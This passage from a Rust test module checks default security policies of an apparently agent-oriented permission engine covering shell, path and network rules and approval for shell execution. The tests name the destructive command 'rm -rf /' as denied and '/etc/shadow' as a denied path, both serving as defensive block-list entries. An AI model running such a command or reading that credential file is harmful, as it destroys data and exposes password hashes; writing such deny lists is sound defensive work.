1110        assert!(policy.denied_commands.contains(&"rm -rf /".to_string()));
1111    }
1112
1113    #[test]
1114    fn test_path_policy_default() {
1115        let policy = PathPolicy::default();
1116        assert!(policy.allowed_read_paths.contains(&"/tmp".to_string()));
1117        assert!(policy.allowed_write_paths.contains(&"/tmp".to_string()));
1118        assert!(policy.denied_paths.contains(&"/etc/shadow".to_string()));
1119    }
1120
1121    #[test]
1122    fn test_network_policy_default() {
1123        let policy = NetworkPolicy::default();
1124        assert!(!policy.deny_all);
1125        assert!(policy.allow_localhost);
1126        assert!(!policy.allow_private_networks);
1127    }
1128
1129    #[test]
1130    fn test_security_policy_default() {
1131        let policy = SecurityPolicy::default();
1132        assert!(!policy.require_approval_all);
1133        assert!(policy
1134            .require_approval_for
1135            .contains(&"shell_exec".to_string()));
1136    }
1137
1138    #[test]
1139    fn test_permissive_policy() {
1140        let engine = PolicyEngine::permissive();
1141        let policy = engine.policy();
1142        assert!(policy.shell.allowed_commands.contains(&"*".to_string()));
1143        assert!(policy.network.allowed_hosts.contains(&"*".to_string()));
1144        assert!(policy.network.allow_private_networks);
1145    }
1146}